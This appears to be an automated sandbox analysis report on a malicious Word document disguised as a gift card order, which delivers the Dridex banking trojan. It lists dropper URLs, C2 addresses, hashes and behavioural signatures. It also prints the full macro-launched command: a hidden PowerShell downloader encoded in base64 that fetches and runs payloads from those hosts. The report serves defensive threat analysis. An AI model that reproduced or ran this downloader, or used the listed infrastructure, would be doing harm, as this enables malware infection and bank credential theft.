Order_Gift_Card.961396645.doc

General
Target

Order_Gift_Card.961396645.doc

Filesize

112KB

Completed

26-11-2020 12:49

Score
10 /10
MD5

7d46d3da88253c6abcc426ce9fb9e3c5

SHA1

8dbd9d1bfe48c59b5704d6275f478e768230c81d

SHA256

9ca6330ecc859154893e48bed53317005670c23c5d58bca8e991177cbb7324e9

Malware Config

Extracted

Language ps1
Deobfuscated
URLs
exe.dropper

https://burstner.clabris.se/ucjk7st.zip

exe.dropper

http://bespokeweddings.ie/k1c8dh4.rar

exe.dropper

https://conjurosdeamoryhechiceriaacacio.com/tjbdhdvi1.zip

exe.dropper

https://keitauniv.keita.ae/wchfvdsd7.rar

exe.dropper

https://cms.keita.ae/h0mqrz.rar

exe.dropper

https://airbornegroup.net/y461xrm.zip

exe.dropper

https://phones.pmrspain.com/xzeoxn8.rar

exe.dropper

http://oya.qa/lfonl5.rar

Extracted

Family dridex
Botnet 10555
C2

194.225.58.216:443

178.254.40.132:691

216.172.165.70:3889

198.57.200.100:3786

rc4.plain
rc4.plain
Signatures 17

Filter: none

Defense Evasion
Discovery
  • Dridex

    Description

    Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

  • Process spawned unexpected child process
    cmd.exe

    Description

    This typically indicates the parent process was compromised via an exploit or macro.

    Reported IOCs

    descriptionpidpid_targetprocesstarget process
    Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process14161728cmd.exe
  • Dridex Loader

    Description

    Detects Dridex both x86 and x64 loader in memory.

    Reported IOCs

    resourceyara_rule
    behavioral1/memory/1856-19-0x0000000000300000-0x000000000033D000-memory.dmpdridex_ldr
  • Blocklisted process makes network request
    powershell.exerundll32.exe

    Reported IOCs

    flowpidprocess
    5368powershell.exe
    71856rundll32.exe
    91856rundll32.exe
  • Loads dropped DLL
    rundll32.exe

    Reported IOCs

    pidprocess
    1856rundll32.exe
    1856rundll32.exe
    1856rundll32.exe
    1856rundll32.exe
  • Checks installed software on the system

    Description

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    Tags

    TTPs

    Query Registry
  • Checks whether UAC is enabled
    rundll32.exe

    TTPs

    System Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key value queried\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUArundll32.exe
  • Drops file in System32 directory
    powershell.exe

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnkpowershell.exe
  • Drops file in Windows directory
    WINWORD.EXE

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\Windows\Debug\WIA\wiatrace.logWINWORD.EXE
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings
    WINWORD.EXE

    TTPs

    Modify Registry

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\ToolbarWINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNoteWINWORD.EXE
    Set value (int)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft ExcelWINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExtWINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"WINWORD.EXE
    Set value (int)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"WINWORD.EXE
  • Modifies registry class
    WINWORD.EXE

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\TypeLib\{F0006E2F-710A-4901-9308-0B405A87B770}WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage"WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\TypeLibWINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage"WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox"WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText"WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\TypeLib\{F0006E2F-710A-4901-9308-0B405A87B770}\2.0\0WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\InterfaceWINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4"WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9"WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl"WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents"WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList"WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}WINWORD.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F0006E2F-710A-4901-9308-0B405A87B770}\2.0\HELPDIRWINWORD.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F0006E2F-710A-4901-9308-0B405A87B770}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden"WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}WINWORD.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6"WINWORD.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}WINWORD.EXE
  • Suspicious behavior: AddClipboardFormatListener
    WINWORD.EXE

    Reported IOCs

    pidprocess
    1756WINWORD.EXE
  • Suspicious behavior: EnumeratesProcesses
    powershell.exe

    Reported IOCs

    pidprocess
    368powershell.exe
    368powershell.exe
  • Suspicious use of AdjustPrivilegeToken
    powershell.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege368powershell.exe
  • Suspicious use of SetWindowsHookEx
    WINWORD.EXE

    Reported IOCs

    pidprocess
    1756WINWORD.EXE
    1756WINWORD.EXE
  • Suspicious use of WriteProcessMemory
    cmd.exepowershell.exerundll32.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 1416 wrote to memory of 3361416cmd.exemsg.exe
    PID 1416 wrote to memory of 3361416cmd.exemsg.exe
    PID 1416 wrote to memory of 3361416cmd.exemsg.exe
    PID 1416 wrote to memory of 3681416cmd.exepowershell.exe
    PID 1416 wrote to memory of 3681416cmd.exepowershell.exe
    PID 1416 wrote to memory of 3681416cmd.exepowershell.exe
    PID 368 wrote to memory of 640368powershell.exerundll32.exe
    PID 368 wrote to memory of 640368powershell.exerundll32.exe
    PID 368 wrote to memory of 640368powershell.exerundll32.exe
    PID 640 wrote to memory of 1856640rundll32.exerundll32.exe
    PID 640 wrote to memory of 1856640rundll32.exerundll32.exe
    PID 640 wrote to memory of 1856640rundll32.exerundll32.exe
    PID 640 wrote to memory of 1856640rundll32.exerundll32.exe
    PID 640 wrote to memory of 1856640rundll32.exerundll32.exe
    PID 640 wrote to memory of 1856640rundll32.exerundll32.exe
    PID 640 wrote to memory of 1856640rundll32.exerundll32.exe
Processes 6
  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Order_Gift_Card.961396645.doc"
    Drops file in Windows directory
    Modifies Internet Explorer settings
    Modifies registry class
    Suspicious behavior: AddClipboardFormatListener
    Suspicious use of SetWindowsHookEx
    PID:1756
  • C:\Windows\system32\cmd.exe
    cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD JAAwADYAVAAgAD0AIAAgAFsAVAB5AHAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiACAALQBGACcAZQBtAC4AaQBvAC4ARABpAHIARQBDACcALAAnAHMAWQBTAHQAJwAsACcAUgBZACcALAAnAFQATwAnACkAOwAgACQAOQB5AGUASAA1AE0AIAA9AFsAdAB5AFAARQBdACgAIgB7ADUAfQB7ADkAfQB7ADMAfQB7ADIAfQB7ADcAfQB7ADQAfQB7ADAAfQB7ADgAfQB7ADEAfQB7ADYAfQAiACAALQBGACAAJwBPAEkAbgBUACcALAAnAEUAJwAsACcALgBuAEUAVAAuAHMARQAnACwAJwBzAFQAZQBNACcALAAnAGkAQwBFAFAAJwAsACcAcwAnACwAJwBSACcALAAnAFIAdgAnACwAJwBNAEEATgBBAEcAJwAsACcAWQAnACkAOwAkAFQAcAA5AHEAdgByAHAAPQAoACgAJwBDAGYAJwArACcAZgAnACkAKwAnAGUAZgAnACsAJwAyAG8AJwApADsAJABIAGgAYgBuAHEAZQBrAD0AJABKADAAeQAxAGsAbgBmACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABBAGUAZQAwADIAMwA3ADsAJABHAHEAeABiAGgANQBnAD0AKAAoACcAVQBfACcAKwAnAGEAJwApACsAJwB2ADYAJwArACcAZwBtACcAKQA7ACAAKAAgAEcAYwBpACAAIAAoACcAVgBhAHIAJwArACcASQBBAEIAbABFACcAKwAnADoAMAA2AFQAJwApACAAIAApAC4AVgBhAGwAdQBlADoAOgAiAEMAYABSAEUAYQBgAFQAYABlAEQASQByAEUAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAzACcAKwAnAFQATAAnACkAKwAoACcAWgBoACcAKwAnAG8AZAAxACcAKQArACgAJwBhACcAKwAnAGwAMwBUACcAKQArACgAJwBMAE4ANwAnACsAJwB6ACcAKwAnADgAcQAnACkAKwAnADMAJwArACgAJwA5ADMAVAAnACsAJwBMACcAKQApAC4AIgBSAEUAYABwAEwAYABBAGMAZQAiACgAKAAnADMAJwArACcAVABMACcAKQAsAFsAUwB0AFIAaQBuAGcAXQBbAGMASABBAHIAXQA5ADIAKQApACkAOwAkAE0AaQB1AHIAZQBpAGsAPQAoACgAJwBHADEAcQAnACsAJwBxAG4AJwApACsAJwByAHkAJwApADsAIAAkADkAeQBlAEgANQBNADoAOgAiAHMARQBDAHUAUgBgAEkAYABUAHkAcAByAE8AYABUAG8AYABjAE8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzADEAJwApACsAJwAyACcAKQA7ACQARwB3ADcAMQBlAG0AagA9ACgAKAAnAFUAJwArACcAZgA5ACcAKQArACgAJwBsAG0AdQAnACsAJwBuACcAKQApADsAJABHAGwAeAB4ADUAcAB5ACAAPQAgACgAKAAnAFUAbgByACcAKwAnAHQAaAAnACsAJwBwACcAKQArACcAcABhACcAKwAnAGYAJwApADsAJABVAHMAbgAxAGYAbABtAD0AKAAoACcASQAnACsAJwBpAGsAeAB4ACcAKQArACcAZgAwACcAKQA7ACQAUgAwAGsAXwBiADEAbQA9ACgAKAAnAFIAXwAnACsAJwBfACcAKQArACgAJwBlAGUANgAnACsAJwBoACcAKQApADsAJABQAHgAegB4ADgAegByAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AWgBoAG8AZAAxAGEAbAB7ADAAJwArACcAfQBOADcAegAnACsAJwA4AHEAMwA5AHsAJwArACcAMAB9ACcAKQAtAGYAIAAgAFsAYwBIAGEAUgBdADkAMgApACsAJABHAGwAeAB4ADUAcAB5ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABPADcAdgAzAGYAYwBhAD0AKAAnAFoAeQAnACsAKAAnAGkAZQB0ACcAKwAnAGYAMgAnACkAKQA7ACQAUwB4ADEAagB1AGUAbwA9AE4AZQBgAHcALQBvAGIAYABqAGUAYwB0ACAAbgBlAHQALgBXAGUAYgBjAGwAaQBFAE4AVAA7ACQARwBoAGsAZwAzAGgAZQA9ACgAKAAoACcAaAB0AHQAcABzACcAKwAnADoAJwApACsAJwBLACcAKwAnACkAJwArACgAKAAnACgAbQAnACsAJwBiADEAKQAoAEsAJwApACkAKwAnACkAJwArACcAKAAnACsAKAAnAG0AYgAnACsAJwAxACcAKQArACgAKAAnACkAKAAnACkAKQArACgAJwBiAHUAJwArACcAcgAnACkAKwAnAHMAJwArACgAJwB0AG4AJwArACcAZQAnACkAKwAoACcAcgAnACsAJwAuAGMAJwApACsAKAAnAGwAYQBiAHIAaQBzACcAKwAnAC4AJwArACcAcwBlACcAKwAnAEsAJwApACsAKAAoACcAKQAoACcAKQApACsAJwBtAGIAJwArACcAMQAnACsAKAAoACcAKQAoACcAKQApACsAKAAnAHUAYwBqAGsAJwArACcANwBzAHQALgAnACkAKwAoACcAegBpAHAAJwArACcAQAAnACkAKwAoACcAaAB0ACcAKwAnAHQAcAA6ACcAKQArACgAKAAnAEsAKQAnACkAKQArACgAKAAnACgAbQAnACsAJwBiADEAJwApACkAKwAoACgAJwApACgASwApACgAJwArACcAbQAnACsAJwBiADEAKQAnACsAJwAoAGIAZQAnACkAKQArACcAcwAnACsAJwBwACcAKwAoACcAbwAnACsAJwBrAGUAJwApACsAKAAnAHcAZQBkACcAKwAnAGQAJwApACsAJwBpAG4AJwArACgAJwBnAHMAJwArACcALgAnACkAKwAnAGkAJwArACgAKAAnAGUASwApACgAJwArACcAbQAnACkAKQArACcAYgAnACsAKAAoACcAMQAnACsAJwApACgAJwApACkAKwAoACcAawAnACsAJwAxAGMAOABkAGgAJwApACsAJwA0ACcAKwAoACcALgByACcAKwAnAGEAJwApACsAKAAnAHIAQABoAHQAdAAnACsAJwBwACcAKQArACgAKAAnAHMAJwArACcAOgBLACkAKABtACcAKwAnAGIAMQAnACsAJwApACgASwApACcAKQApACsAKAAoACcAKABtAGIAMQAnACsAJwApACgAJwArACcAYwBvACcAKQApACsAKAAnAG4AagAnACsAJwB1AHIAJwApACsAKAAnAG8AcwAnACsAJwBkAGUAYQAnACkAKwAoACcAbQBvACcAKwAnAHIAJwApACsAKAAnAHkAaAAnACsAJwBlAGMAJwApACsAKAAnAGgAaQAnACsAJwBjAGUAcgBpAGEAJwApACsAJwBhACcAKwAoACgAJwBjAGEAYwAnACsAJwBpAG8ALgBjAG8AJwArACcAbQBLACcAKwAnACkAJwApACkAKwAoACgAJwAoAG0AJwArACcAYgAxACcAKQApACsAJwApACcAKwAoACgAJwAoACcAKwAnAHQAagAnACkAKQArACgAJwBiACcAKwAnAGQAaABkAHYAaQAnACsAJwAxAC4AJwApACsAKAAnAHoAaQBwACcAKwAnAEAAaAAnACkAKwAoACgAJwB0AHQAcABzACcAKwAnADoASwApACgAbQAnACsAJwBiACcAKQApACsAKAAoACcAMQApACcAKwAnACgASwAnACsAJwApACgAbQAnACkAKQArACcAYgAnACsAKAAoACcAMQApACcAKQApACsAKAAoACcAKABrACcAKwAnAGUAaQB0ACcAKQApACsAKAAnAGEAJwArACcAdQBuAGkAdgAuACcAKwAnAGsAZQAnACkAKwAoACcAaQB0ACcAKwAnAGEAJwApACsAKAAnAC4AYQAnACsAJwBlAEsAJwApACsAKAAoACcAKQAoAG0AJwArACcAYgAxACcAKQApACsAKAAoACcAKQAoAHcAJwArACcAYwBoAGYAJwApACkAKwAoACcAdgBkAHMAJwArACcAZAAnACkAKwAnADcALgAnACsAJwByACcAKwAnAGEAJwArACcAcgAnACsAJwBAACcAKwAoACcAaAB0AHQAJwArACcAcAAnACkAKwAnAHMAJwArACgAKAAnADoASwAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwBtAGIAMQApACgAJwApACkAKwAnAEsAJwArACgAKAAnACkAKABtACcAKwAnAGIAMQApACcAKwAnACgAYwAnACkAKQArACcAbQAnACsAKAAnAHMALgBrACcAKwAnAGUAaQB0AGEAJwApACsAJwAuAGEAJwArACgAKAAnAGUAJwArACcASwApACgAbQBiADEAKQAoACcAKwAnAGgAJwArACcAMABtACcAKQApACsAKAAnAHEAcgAnACsAJwB6ACcAKQArACgAJwAuACcAKwAnAHIAYQAnACkAKwAnAHIAJwArACcAQAAnACsAJwBoACcAKwAoACgAJwB0AHQAcAAnACsAJwBzADoASwApACcAKwAnACgAbQBiADEAJwApACkAKwAoACgAJwApACgASwApACgAJwArACcAbQBiACcAKwAnADEAKQAoACcAKwAnAGEAJwApACkAKwAoACcAaQByACcAKwAnAGIAJwApACsAJwBvACcAKwAoACcAcgAnACsAJwBuAGUAZwAnACkAKwAnAHIAJwArACgAJwBvAHUAJwArACcAcAAnACkAKwAnAC4AJwArACcAbgAnACsAJwBlACcAKwAnAHQAJwArACgAKAAnAEsAKQAnACkAKQArACgAKAAnACgAbQAnACsAJwBiACcAKQApACsAJwAxACcAKwAoACgAJwApACgAeQA0ACcAKwAnADYAJwApACkAKwAnADEAeAAnACsAKAAnAHIAJwArACcAbQAuACcAKQArACcAegBpACcAKwAoACcAcABAACcAKwAnAGgAdAAnACkAKwAnAHQAJwArACcAcAAnACsAJwBzADoAJwArACgAKAAnAEsAKQAoACcAKwAnAG0AJwApACkAKwAnAGIAMQAnACsAKAAoACcAKQAoAEsAJwArACcAKQAoAG0AJwApACkAKwAoACgAJwBiADEAJwArACcAKQAoAHAAaAAnACsAJwBvACcAKwAnAG4AZQBzACcAKQApACsAJwAuAHAAJwArACgAJwBtAHIAcwBwAGEAJwArACcAaQAnACkAKwAnAG4AJwArACgAKAAnAC4AYwBvAG0ASwApACgAJwArACcAbQBiADEAKQAoAHgAegAnACsAJwBlACcAKwAnAG8AeAAnACkAKQArACcAbgA4ACcAKwAnAC4AJwArACcAcgBhACcAKwAnAHIAJwArACgAJwBAACcAKwAnAGgAdAB0AHAAOgAnACkAKwAnAEsAJwArACcAKQAnACsAKAAoACcAKAAnACsAJwBtAGIAJwApACkAKwAoACgAJwAxACkAKABLACkAKABtAGIAJwArACcAMQAnACsAJwApACgAJwArACcAbwAnACkAKQArACcAeQAnACsAKAAoACcAYQAuAHEAYQBLACcAKwAnACkAJwApACkAKwAoACgAJwAoAG0AYgAxACkAJwArACcAKAAnACkAKQArACgAJwBsAGYAbwAnACsAJwBuAGwANQAuAHIAJwApACsAJwBhAHIAJwApACkALgAiAFIAYABFAGAAUABsAGEAYwBFACIAKAAoACgA